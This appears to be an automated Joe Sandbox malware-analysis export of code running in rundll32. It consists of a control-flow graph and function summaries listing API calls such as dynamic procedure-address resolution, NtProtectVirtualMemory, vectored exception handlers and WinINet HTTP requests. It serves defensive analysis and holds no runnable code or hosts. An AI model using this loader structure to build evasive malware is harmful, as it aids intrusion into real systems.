LdrGetProcedureAddress 17455->17456 17457 1b0a35c217f 17456->17457 17458 1b0a35bcce0 LdrGetProcedureAddress 17457->17458 17459 1b0a35c21b0 17458->17459 17460 1b0a35bcce0 LdrGetProcedureAddress 17459->17460 17460->17291 17462 1b0a35c01ce 17461->17462 17463 1b0a35c0e4a 17462->17463 17464 1b0a35bcce0 LdrGetProcedureAddress 17462->17464 17463->17276 17465 1b0a35c0228 17464->17465 17466 1b0a35bcce0 LdrGetProcedureAddress 17465->17466 17467 1b0a35c0243 17466->17467 17468 1b0a35bcce0 LdrGetProcedureAddress 17467->17468 17469 1b0a35c026c 17468->17469 17470 1b0a35bcce0 LdrGetProcedureAddress 17469->17470 17471 1b0a35c028b 17470->17471 17472 
1b0a35bcce0 LdrGetProcedureAddress 17471->17472 17473 1b0a35c02aa 17472->17473 17474 1b0a35bcce0 LdrGetProcedureAddress 17473->17474 17475 1b0a35c02c9 17474->17475 17476 1b0a35bcce0 LdrGetProcedureAddress 17475->17476 17477 1b0a35c02e8 17476->17477 17478 1b0a35bcce0 LdrGetProcedureAddress 17477->17478 17479 1b0a35c0307 17478->17479 17480 1b0a35bcce0 LdrGetProcedureAddress 17479->17480 17481 1b0a35c0326 17480->17481 17482 1b0a35bcce0 LdrGetProcedureAddress 17481->17482 17483 1b0a35c0345 17482->17483 17484 1b0a35bcce0 LdrGetProcedureAddress 17483->17484 17485 1b0a35c0364 17484->17485 17486 1b0a35bcce0 LdrGetProcedureAddress 17485->17486 17487 1b0a35c0383 17486->17487 17488 1b0a35bcce0 LdrGetProcedureAddress 17487->17488 17489 1b0a35c03a2 17488->17489 17490 1b0a35bcce0 LdrGetProcedureAddress 17489->17490 17491 1b0a35c03c1 17490->17491 17492 1b0a35bcce0 LdrGetProcedureAddress 17491->17492 17493 1b0a35c03e0 17492->17493 17494 1b0a35bcce0 LdrGetProcedureAddress 17493->17494 17495 1b0a35c03ff 17494->17495 17496 1b0a35bcce0 LdrGetProcedureAddress 17495->17496 17497 1b0a35c041e 17496->17497 17498 1b0a35bcce0 LdrGetProcedureAddress 17497->17498 17499 1b0a35c043d 17498->17499 17500 1b0a35bcce0 LdrGetProcedureAddress 17499->17500 17501 1b0a35c045c 17500->17501 17502 1b0a35bcce0 LdrGetProcedureAddress 17501->17502 17503 1b0a35c047b 17502->17503 17504 1b0a35bcce0 LdrGetProcedureAddress 17503->17504 17505 1b0a35c049a 17504->17505 17506 1b0a35bcce0 LdrGetProcedureAddress 17505->17506 17507 1b0a35c04b9 17506->17507 17508 1b0a35bcce0 LdrGetProcedureAddress 17507->17508 17509 1b0a35c04d8 17508->17509 17510 1b0a35bcce0 LdrGetProcedureAddress 17509->17510 17511 1b0a35c04f7 17510->17511 17512 1b0a35bcce0 LdrGetProcedureAddress 17511->17512 17513 1b0a35c0516 17512->17513 17514 1b0a35bcce0 LdrGetProcedureAddress 17513->17514 17515 1b0a35c0535 17514->17515 17516 1b0a35bcce0 LdrGetProcedureAddress 17515->17516 17517 1b0a35c0554 17516->17517 17518 1b0a35bcce0 LdrGetProcedureAddress 
17517->17518 17519 1b0a35c0573 17518->17519 17520 1b0a35bcce0 LdrGetProcedureAddress 17519->17520 17521 1b0a35c0592 17520->17521 17522 1b0a35bcce0 LdrGetProcedureAddress 17521->17522 17523 1b0a35c05b1 17522->17523 17524 1b0a35bcce0 LdrGetProcedureAddress 17523->17524 17525 1b0a35c05d0 17524->17525 17526 1b0a35bcce0 LdrGetProcedureAddress 17525->17526 17527 1b0a35c05ef 17526->17527 17528 1b0a35bcce0 LdrGetProcedureAddress 17527->17528 17529 1b0a35c060e 17528->17529 17530 1b0a35bcce0 LdrGetProcedureAddress 17529->17530 17531 1b0a35c062d 17530->17531 17532 1b0a35bcce0 LdrGetProcedureAddress 17531->17532 17533 1b0a35c064c 17532->17533 17534 1b0a35bcce0 LdrGetProcedureAddress 17533->17534 17535 1b0a35c066b 17534->17535 17536 1b0a35bcce0 LdrGetProcedureAddress 17535->17536 17537 1b0a35c068a 17536->17537 17538 1b0a35bcce0 LdrGetProcedureAddress 17537->17538 17539 1b0a35c06a9 17538->17539 17540 1b0a35bcce0 LdrGetProcedureAddress 17539->17540 17541 1b0a35c06c8 17540->17541 17542 1b0a35bcce0 LdrGetProcedureAddress 17541->17542 17543 1b0a35c06e7 17542->17543 17544 1b0a35bcce0 LdrGetProcedureAddress 17543->17544 17545 1b0a35c0706 17544->17545 17546 1b0a35bcce0 LdrGetProcedureAddress 17545->17546 17547 1b0a35c0725 17546->17547 17548 1b0a35bcce0 LdrGetProcedureAddress 17547->17548 17549 1b0a35c0744 17548->17549 17550 1b0a35bcce0 LdrGetProcedureAddress 17549->17550 17551 1b0a35c0763 17550->17551 17552 1b0a35bcce0 LdrGetProcedureAddress 17551->17552 17553 1b0a35c0782 17552->17553 17554 1b0a35bcce0 LdrGetProcedureAddress 17553->17554 17555 1b0a35c07a1 17554->17555 17556 1b0a35bcce0 LdrGetProcedureAddress 17555->17556 17557 1b0a35c07c0 17556->17557 17558 1b0a35bcce0 LdrGetProcedureAddress 17557->17558 17559 1b0a35c07df 17558->17559 17560 1b0a35bcce0 LdrGetProcedureAddress 17559->17560 17561 1b0a35c07fe 17560->17561 17562 1b0a35bcce0 LdrGetProcedureAddress 17561->17562 17563 1b0a35c081d 17562->17563 17564 1b0a35bcce0 LdrGetProcedureAddress 17563->17564 17565 1b0a35c083c 17564->17565 
17566 1b0a35bcce0 LdrGetProcedureAddress 17565->17566 17567 1b0a35c085b 17566->17567 17568 1b0a35bcce0 LdrGetProcedureAddress 17567->17568 17569 1b0a35c087a 17568->17569 17570 1b0a35bcce0 LdrGetProcedureAddress 17569->17570 17571 1b0a35c0899 17570->17571 17572 1b0a35bcce0 LdrGetProcedureAddress 17571->17572 17573 1b0a35c08b8 17572->17573 17574 1b0a35bcce0 LdrGetProcedureAddress 17573->17574 17575 1b0a35c08d7 17574->17575 17576 1b0a35bcce0 LdrGetProcedureAddress 17575->17576 17577 1b0a35c08f6 17576->17577 17578 1b0a35bcce0 LdrGetProcedureAddress 17577->17578 17579 1b0a35c0915 17578->17579 17580 1b0a35bcce0 LdrGetProcedureAddress 17579->17580 17581 1b0a35c0934 17580->17581 17582 1b0a35bcce0 LdrGetProcedureAddress 17581->17582 17583 1b0a35c0953 17582->17583 17584 1b0a35bcce0 LdrGetProcedureAddress 17583->17584 17585 1b0a35c0972 17584->17585 17586 1b0a35bcce0 LdrGetProcedureAddress 17585->17586 17587 1b0a35c0991 17586->17587 17588 1b0a35bcce0 LdrGetProcedureAddress 17587->17588 17589 1b0a35c09b0 17588->17589 17590 1b0a35bcce0 LdrGetProcedureAddress 17589->17590 17591 1b0a35c09cf 17590->17591 17592 1b0a35bcce0 LdrGetProcedureAddress 17591->17592 17593 1b0a35c09ee 17592->17593 17594 1b0a35bcce0 LdrGetProcedureAddress 17593->17594 17595 1b0a35c0a0d 17594->17595 17596 1b0a35bcce0 LdrGetProcedureAddress 17595->17596 17597 1b0a35c0a2c 17596->17597 17598 1b0a35bcce0 LdrGetProcedureAddress 17597->17598 17599 1b0a35c0a4b 17598->17599 17600 1b0a35bcce0 LdrGetProcedureAddress 17599->17600 17601 1b0a35c0a6a 17600->17601 17602 1b0a35bcce0 LdrGetProcedureAddress 17601->17602 17603 1b0a35c0a89 17602->17603 17604 1b0a35bcce0 LdrGetProcedureAddress 17603->17604 17605 1b0a35c0aa8 17604->17605 17606 1b0a35bcce0 LdrGetProcedureAddress 17605->17606 17607 1b0a35c0ac7 17606->17607 17608 1b0a35bcce0 LdrGetProcedureAddress 17607->17608 17609 1b0a35c0ae6 17608->17609 17610 1b0a35bcce0 LdrGetProcedureAddress 17609->17610 17611 1b0a35c0b05 17610->17611 17612 1b0a35bcce0 LdrGetProcedureAddress 
17611->17612 17613 1b0a35c0b24 17612->17613 17614 1b0a35bcce0 LdrGetProcedureAddress 17613->17614 17615 1b0a35c0b43 17614->17615 17616 1b0a35bcce0 LdrGetProcedureAddress 17615->17616 17617 1b0a35c0b62 17616->17617 17618 1b0a35bcce0 LdrGetProcedureAddress 17617->17618 17619 1b0a35c0b81 17618->17619 17620 1b0a35bcce0 LdrGetProcedureAddress 17619->17620 17621 1b0a35c0ba0 17620->17621 17622 1b0a35bcce0 LdrGetProcedureAddress 17621->17622 17623 1b0a35c0bbf 17622->17623 17624 1b0a35bcce0 LdrGetProcedureAddress 17623->17624 17625 1b0a35c0bde 17624->17625 17626 1b0a35bcce0 LdrGetProcedureAddress 17625->17626 17627 1b0a35c0bfd 17626->17627 17628 1b0a35bcce0 LdrGetProcedureAddress 17627->17628 17629 1b0a35c0c1c 17628->17629 17630 1b0a35bcce0 LdrGetProcedureAddress 17629->17630 17631 1b0a35c0c3b 17630->17631 17632 1b0a35bcce0 LdrGetProcedureAddress 17631->17632 17633 1b0a35c0c5a 17632->17633 17634 1b0a35bcce0 LdrGetProcedureAddress 17633->17634 17635 1b0a35c0c79 17634->17635 17636 1b0a35bcce0 LdrGetProcedureAddress 17635->17636 17637 1b0a35c0c98 17636->17637 17638 1b0a35bcce0 LdrGetProcedureAddress 17637->17638 17639 1b0a35c0cb7 17638->17639 17640 1b0a35bcce0 LdrGetProcedureAddress 17639->17640 17641 1b0a35c0cd6 17640->17641 17642 1b0a35bcce0 LdrGetProcedureAddress 17641->17642 17643 1b0a35c0cf5 17642->17643 17644 1b0a35bcce0 LdrGetProcedureAddress 17643->17644 17645 1b0a35c0d14 17644->17645 17646 1b0a35bcce0 LdrGetProcedureAddress 17645->17646 17647 1b0a35c0d33 17646->17647 17648 1b0a35bcce0 LdrGetProcedureAddress 17647->17648 17649 1b0a35c0d52 17648->17649 17650 1b0a35bcce0 LdrGetProcedureAddress 17649->17650 17651 1b0a35c0d71 17650->17651 17652 1b0a35bcce0 LdrGetProcedureAddress 17651->17652 17653 1b0a35c0d90 17652->17653 17654 1b0a35bcce0 LdrGetProcedureAddress 17653->17654 17655 1b0a35c0daf 17654->17655 17656 1b0a35bcce0 LdrGetProcedureAddress 17655->17656 17657 1b0a35c0dce 17656->17657 17658 1b0a35bcce0 LdrGetProcedureAddress 17657->17658 17659 1b0a35c0ded 17658->17659 
17660 1b0a35bcce0 LdrGetProcedureAddress 17659->17660 17661 1b0a35c0e0c 17660->17661 17662 1b0a35bcce0 LdrGetProcedureAddress 17661->17662 17663 1b0a35c0e2b 17662->17663 17664 1b0a35bcce0 LdrGetProcedureAddress 17663->17664 17664->17463 17665 1b0a35b7830 17666 1b0a35b788a InternetOpenW 17665->17666 17667 1b0a35b7885 17665->17667 17668 1b0a35b7ae3 17666->17668 17669 1b0a35b7898 InternetConnectW 17666->17669 17667->17666 17671 1b0a35b7b0e InternetCloseHandle 17668->17671 17674 1b0a35b7b17 17668->17674 17669->17668 17670 1b0a35b78dd HttpOpenRequestW 17669->17670 17670->17668 17672 1b0a35b7931 17670->17672 17671->17674 17672->17668 17673 1b0a35b79cb HttpSendRequestA 17672->17673 17673->17668 17676 1b0a35b79e4 17673->17676 17675 1b0a35b7a3f InternetQueryDataAvailable 17675->17668 17675->17676 17676->17668 17676->17675 18610 1b0a35d27b0 18611 1b0a35c2210 3 API calls 18610->18611 18612 1b0a35d27cb 18611->18612 18613 1b0a35c23d0 3 API calls 18612->18613 18614 1b0a35d27d0 18613->18614 18619 1b0a35becd0 18614->18619 18617 1b0a35c2c40 3 API calls 18618 1b0a35d27da 18617->18618 18621 1b0a35bece9 18619->18621 18620 1b0a35becf3 18620->18617 18621->18620 18622 1b0a35c77e0 2 API calls 18621->18622 18623 1b0a35bed42 18622->18623 18623->18620 18624 1b0a35bcce0 LdrGetProcedureAddress 18623->18624 18625 1b0a35bed5b 18624->18625 18626 1b0a35bcce0 LdrGetProcedureAddress 18625->18626 18626->18620 18846 1b0a35d4a30 18849 1b0a35d4550 18846->18849 18850 1b0a35d457c 18849->18850 18851 1b0a35d4a0b 18850->18851 18852 1b0a35c2c40 3 API calls 18850->18852 18853 1b0a35d458f 18852->18853 18854 1b0a35c12c0 3 API calls 18853->18854 18861 1b0a35d45a1 18854->18861 18855 1b0a35d462f 18856 1b0a35d48bd 18855->18856 18857 1b0a35e4be0 NtProtectVirtualMemory 18855->18857 18859 1b0a35ba230 3 API calls 18856->18859 18862 1b0a35d48db 18856->18862 18858 1b0a35d488f 18857->18858 18860 1b0a35e3a40 NtProtectVirtualMemory 18858->18860 18859->18862 18860->18856 18861->18855 18873 1b0a35bc7a0 18861->18873 
18862->18851 18870 1b0a35e4740 NtFreeVirtualMemory 18862->18870 18864 1b0a35d474d 18864->18855 18865 1b0a35ba230 3 API calls 18864->18865 18866 1b0a35d477e 18865->18866 18866->18855 18867 1b0a35b4cd0 2 API calls 18866->18867 18868 1b0a35d4797 18867->18868 18868->18855 18869 1b0a35b4cd0 2 API calls 18868->18869 18872 1b0a35d47c4 18869->18872 18870->18851 18871 1b0a35ba230 3 API calls 18871->18855 18872->18855 18872->18871 18874 1b0a35bc7e6 18873->18874 18880 1b0a35bc7ee 18873->18880 18875 1b0a35c8fb0 3 API calls 18874->18875 18875->18880 18876 1b0a35c77e0 2 API calls 18876->18880 18877 1b0a35bc7f3 18877->18864 18878 1b0a35e4be0 NtProtectVirtualMemory 18879 1b0a35bc9de 18878->18879 18879->18877 18879->18878 18880->18876 18880->18877 18880->18879 18881 1b0a35bcce0 LdrGetProcedureAddress 18880->18881 18881->18880 18493 1b0a35def30 18495 1b0a35def54 18493->18495 18494 1b0a35df0ba 18495->18494 18496 1b0a35df060 18495->18496 18499 1b0a35ced90 18495->18499 18496->18494 18497 1b0a35ced90 3 API calls 18496->18497 18497->18494 18500 1b0a35c1440 3 API calls 18499->18500 18501 1b0a35cedb8 18500->18501 18501->18495 18375 1b0a35ca8eb 18376 1b0a35ca8fc 18375->18376 18382 1b0a35ca91e 18376->18382 18391 1b0a35c8fb0 18376->18391 18378 1b0a35caf0c 18381 1b0a35e4be0 NtProtectVirtualMemory 18378->18381 18379 1b0a35caf7a 18386 1b0a35cafc2 18379->18386 18387 1b0a35e4740 NtFreeVirtualMemory 18379->18387 18380 1b0a35ca930 18380->18378 18380->18379 18383 1b0a35caf45 18381->18383 18382->18380 18384 1b0a35e4be0 NtProtectVirtualMemory 18382->18384 18390 1b0a35caf78 18382->18390 18396 1b0a35cf100 18382->18396 18389 1b0a35e3a40 NtProtectVirtualMemory 18383->18389 18384->18382 18388 1b0a35e4740 NtFreeVirtualMemory 18386->18388 18387->18379 18388->18390 18389->18390 18392 1b0a35c77e0 2 API calls 18391->18392 18394 1b0a35c8fc4 18392->18394 18393 1b0a35c8fce 18393->18382 18394->18393 18395 1b0a35e4be0 NtProtectVirtualMemory 18394->18395 18395->18393 18398 1b0a35cf168 18396->18398 18397 1b0a35cf220 
18397->18382 18398->18397 18399 1b0a35c77e0 2 API calls 18398->18399 18400 1b0a35cf28f 18399->18400 18400->18397 18401 1b0a35bcce0 LdrGetProcedureAddress 18400->18401 18401->18397 17741 1b0a35c77e0 17742 1b0a35c7800 17741->17742 17743 1b0a35c780d RtlAddVectoredExceptionHandler 17742->17743 17746 1b0a35c7805 17742->17746 17744 1b0a35c7827 17743->17744 17745 1b0a35c78f1 RtlRemoveVectoredExceptionHandler 17744->17745 17744->17746 17745->17746 18402 1b0a35cb4e0 18403 1b0a35c2d20 3 API calls 18402->18403 18404 1b0a35cb50d 18403->18404 18409 1b0a35c37a0 18404->18409 18406 1b0a35cb5ba 18407 1b0a35cb512 18407->18406 18429 1b0a35cfdb0 18407->18429 18410 1b0a35c37b9 18409->18410 18411 1b0a35c77e0 2 API calls 18410->18411 18413 1b0a35c37c3 18410->18413 18412 1b0a35c3812 18411->18412 18412->18413 18414 1b0a35bcce0 LdrGetProcedureAddress 18412->18414 18413->18407 18415 1b0a35c3832 18414->18415 18416 1b0a35bcce0 LdrGetProcedureAddress 18415->18416 18417 1b0a35c384d 18416->18417 18418 1b0a35bcce0 LdrGetProcedureAddress 18417->18418 18419 1b0a35c3876 18418->18419 18420 1b0a35bcce0 LdrGetProcedureAddress 18419->18420 18421 1b0a35c3895 18420->18421 18422 1b0a35bcce0 LdrGetProcedureAddress 18421->18422 18423 1b0a35c38b4 18422->18423 18424 1b0a35bcce0 LdrGetProcedureAddress 18423->18424 18425 1b0a35c38d3 18424->18425 18426 1b0a35bcce0 LdrGetProcedureAddress 18425->18426 18427 1b0a35c38f2 18426->18427 18428 1b0a35bcce0 LdrGetProcedureAddress 18427->18428 18428->18413 18430 1b0a35c37a0 3 API calls 18429->18430 18431 1b0a35cfde5 18430->18431 18431->18407 18432 1b0a35d5ae0 18434 1b0a35d5b01 18432->18434 18433 1b0a35d5c0f 18434->18433 18435 1b0a35b3c30 2 API calls 18434->18435 18435->18433 17747 1b0a35e4be0 17748 1b0a35e4c02 17747->17748 17749 1b0a35e4c5e 17748->17749 17750 1b0a35e4c5c NtProtectVirtualMemory 17748->17750 17750->17749 18502 1b0a35e2f60 18507 1b0a35c2210 18502->18507 18505 1b0a35c23d0 3 API calls 18506 1b0a35e2f86 18505->18506 18509 1b0a35c2227 18507->18509 18508 1b0a35c22a5 
18510 1b0a35bcce0 LdrGetProcedureAddress 18508->18510 18509->18508 18512 1b0a35c77e0 2 API calls 18509->18512 18516 1b0a35c2231 18509->18516 18511 1b0a35c22c0 18510->18511 18513 1b0a35bcce0 LdrGetProcedureAddress 18511->18513 18514 1b0a35c2285 18512->18514 18515 1b0a35c22e9 18513->18515 18514->18516 18518 1b0a35bcce0 LdrGetProcedureAddress 18514->18518 18517 1b0a35bcce0 LdrGetProcedureAddress 18515->18517 18516->18505 18519 1b0a35c2308 18517->18519 18518->18508 18520 1b0a35bcce0 LdrGetProcedureAddress 18519->18520 18521 1b0a35c2327 18520->18521 18522 1b0a35bcce0 LdrGetProcedureAddress 18521->18522 18523 1b0a35c2346 18522->18523 18524 1b0a35bcce0 LdrGetProcedureAddress 18523->18524 18525 1b0a35c2365 18524->18525 18526 1b0a35bcce0 LdrGetProcedureAddress 18525->18526 18527 1b0a35c2384 18526->18527 18528 1b0a35bcce0 LdrGetProcedureAddress 18527->18528 18528->18516 18885 1b0a35ca650 18894 1b0a35ca671 18885->18894 18886 1b0a35caf0c 18888 1b0a35e4be0 NtProtectVirtualMemory 18886->18888 18887 1b0a35caf7a 18890 1b0a35cafc2 18887->18890 18891 1b0a35e4740 NtFreeVirtualMemory 18887->18891 18889 1b0a35caf45 18888->18889 18893 1b0a35e3a40 NtProtectVirtualMemory 18889->18893 18892 1b0a35e4740 NtFreeVirtualMemory 18890->18892 18891->18887 18895 1b0a35caf78 18892->18895 18893->18895 18894->18886 18894->18887 18894->18895 18442 1b0a35d44d0 18444 1b0a35d44ec 18442->18444 18443 1b0a35d452a 18444->18443 18445 1b0a35d7220 10 API calls 18444->18445 18445->18443 18896 1b0a35d4a50 18897 1b0a35d4550 7 API calls 18896->18897 18898 1b0a35d4a5f 18897->18898 18529 1b0a35df950 18531 1b0a35df96b 18529->18531 18530 1b0a35df9b8 18531->18530 18533 1b0a35c8820 18531->18533 18536 1b0a35c8894 18533->18536 18534 1b0a35c89b7 18534->18530 18535 1b0a35b2350 9 API calls 18535->18536 18536->18534 18536->18535

      Control-flow Graph

      APIs
      Memory Dump Source
      • Source File: 00000009.00000002.3273232656.000001B0A35B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B0A35B1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_9_2_1b0a35b1000_rundll32.jbxd
      Similarity
      • API ID: InfoName$AdaptersComputer$InformationNativeSystemTokenUser
      • String ID:
      • API String ID: 1596153048-0
      • Opcode ID: 97f414de48c75473fab4d7ded8ed9c9c815162e0241c79caef865829c24d2fb3
      • Instruction ID: 4ba5c714c8120f860050ff9ed9d6d92f0deb16946bac1cfb03b63753fb39afed
      • Opcode Fuzzy Hash: 97f414de48c75473fab4d7ded8ed9c9c815162e0241c79caef865829c24d2fb3
      • Instruction Fuzzy Hash: F5A1A730218B084FE755EB39D8967DBB7E5FB98340F40492DA44AC7291DFB8DA458B82

      Control-flow Graph

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000009.00000002.3273232656.000001B0A35B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B0A35B1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_9_2_1b0a35b1000_rundll32.jbxd
      Similarity
      • API ID: Thread32$CreateFirstNextSnapshotToolhelp32
      • String ID: 0
      • API String ID: 3779972765-4108050209
      • Opcode ID: 7d6ec060ca6ff104e599d54b27dc2336fbe3cd82a434029ae01abf51b05e4548
      • Instruction ID: 055ff8271526ab05cb6148a78bd67fb022ae4ca6c4666f3e516bfa6524c59626
      • Opcode Fuzzy Hash: 7d6ec060ca6ff104e599d54b27dc2336fbe3cd82a434029ae01abf51b05e4548
      • Instruction Fuzzy Hash: 3C718130218B488FE795EF79D485BEBB7E1FB88304F50496DA58DC3292DBB0D5458B42

      Control-flow Graph

      APIs
      Memory Dump Source
      • Source File: 00000009.00000002.3273232656.000001B0A35B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B0A35B1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_9_2_1b0a35b1000_rundll32.jbxd
      Similarity
      • API ID: ExceptionHandlerVectored$Remove
      • String ID:
      • API String ID: 3670940754-0
      • Opcode ID: 7ab087cfcf78975a284b095aad224ccf15d9cc2dbaabd67c1079e5a8e1d1515c
      • Instruction ID: b3bbca6aa086e659cc123549f48e6e19f6bdc4c5b9cd0cd014d360c72094005d
      • Opcode Fuzzy Hash: 7ab087cfcf78975a284b095aad224ccf15d9cc2dbaabd67c1079e5a8e1d1515c
      • Instruction Fuzzy Hash: D331C330218B084FE75AAB3C9C9A2AB77E5F75C315F10462EE847C35E1DFA4D802C686

      Control-flow Graph

      APIs
      Memory Dump Source
      • Source File: 00000009.00000002.3273232656.000001B0A35B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B0A35B1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_9_2_1b0a35b1000_rundll32.jbxd
      Similarity
      • API ID: AddressProcedure
      • String ID:
      • API String ID: 3653107232-0
      • Opcode ID: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
      • Instruction ID: 11d3cfcaad059b56e5c89a30165dca91fe253c2e4761610c3641238a8ad65cd6
      • Opcode Fuzzy Hash: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
      • Instruction Fuzzy Hash: 9131A335118B484BD7649E28DC867FBB7E4FB8A310F500A1EE586C3251E760A84587C6

      Control-flow Graph

      APIs
      Memory Dump Source
      • Source File: 00000009.00000002.3273232656.000001B0A35B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B0A35B1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_9_2_1b0a35b1000_rundll32.jbxd
      Similarity
      • API ID: Internet$HttpOpenRequest$AvailableCloseConnectDataHandleQuerySend
      • String ID:
      • API String ID: 305742638-0
      • Opcode ID: 488b002841e1bd412dd0cc874d8b1d67b82a8a3cb49ca359c288d6713fbca809
      • Instruction ID: 0a9f9a56f5591827495604cedee59ab93b4c9ba99aa374f93d48b315297c9f1a
      • Opcode Fuzzy Hash: 488b002841e1bd412dd0cc874d8b1d67b82a8a3cb49ca359c288d6713fbca809
      • Instruction Fuzzy Hash: 2FB18330218B088BE755EF3CD8957ABB7E5FF98340F14496DA84AC7291EFB4D9418782
      Strings
      Memory Dump Source
      • Source File: 00000009.00000003.2136799386.000001B0A3570000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0A3570000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_9_3_1b0a3570000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID: 0-3916222277
      • Opcode ID: e1b5f217ab961a454b36722efd1ce63e8d0791c74eab14a614d4f9e3fc2a9a33
      • Instruction ID: 0c1e28b45ea7ca56466ac39dc4ce827f5ba664c67e9836d6f4974b7c26248020
      • Opcode Fuzzy Hash: e1b5f217ab961a454b36722efd1ce63e8d0791c74eab14a614d4f9e3fc2a9a33
      • Instruction Fuzzy Hash: 13B1B73161CB088FDB54EF2CC885BAAB7E1FB98310F404A6DE44AC7251DB74E945CB82

      Control-flow Graph

      APIs
      Memory Dump Source
      • Source File: 00000009.00000002.3273232656.000001B0A35B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B0A35B1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_9_2_1b0a35b1000_rundll32.jbxd
      Similarity
      • API ID: Fiber$CreateDelete
      • String ID:
      • API String ID: 2527733159-0
      • Opcode ID: 93f026081dbdd0704688566a40b49887aa3b7977c0bffc28660abc2339b77c2a
      • Instruction ID: 56ba95b49508827bb525aad12212c5592e64c7b3cab3d89debfff55a79da35e7
      • Opcode Fuzzy Hash: 93f026081dbdd0704688566a40b49887aa3b7977c0bffc28660abc2339b77c2a
      • Instruction Fuzzy Hash: 4851D831618B144BE7ADAF3C98957A673D1FB58315F201629E89BC31D1DB749C4287C2

      Control-flow Graph

      APIs
      Memory Dump Source
      • Source File: 00000009.00000002.3273232656.000001B0A35B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B0A35B1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_9_2_1b0a35b1000_rundll32.jbxd
      Similarity
      • API ID: CreateMutex
      • String ID:
      • API String ID: 1964310414-0
      • Opcode ID: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
      • Instruction ID: 822493b199a1ca4853018cab78bd2007314dfbeb2d915cf6b59fd8e26ffc3259
      • Opcode Fuzzy Hash: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
      • Instruction Fuzzy Hash: 1DE12171418A0D8FE751EF18E895BE6B7F4F768380F20067BE84AC3161DB789245CB86
      APIs
      Memory Dump Source
      • Source File: 00000009.00000003.2136799386.000001B0A3570000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0A3570000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_9_3_1b0a3570000_rundll32.jbxd
      Similarity
      • API ID: AllocateHeap
      • String ID:
      • API String ID: 1279760036-0
      • Opcode ID: dda5bd23e4ac47bd42f6dd929fb15fd9a0e68714a6453c9134859c40f5c4eed3
      • Instruction ID: 1d121763a2955ff0c50a3ef2eda0bf8fff4baf10bef5fbfe4b39cd038cbb95de
      • Opcode Fuzzy Hash: dda5bd23e4ac47bd42f6dd929fb15fd9a0e68714a6453c9134859c40f5c4eed3
      • Instruction Fuzzy Hash: 78012D30A19B1A0BE7DBA77D68C4BE377C1F79E350F5445A5D80AC7246DB64CC514380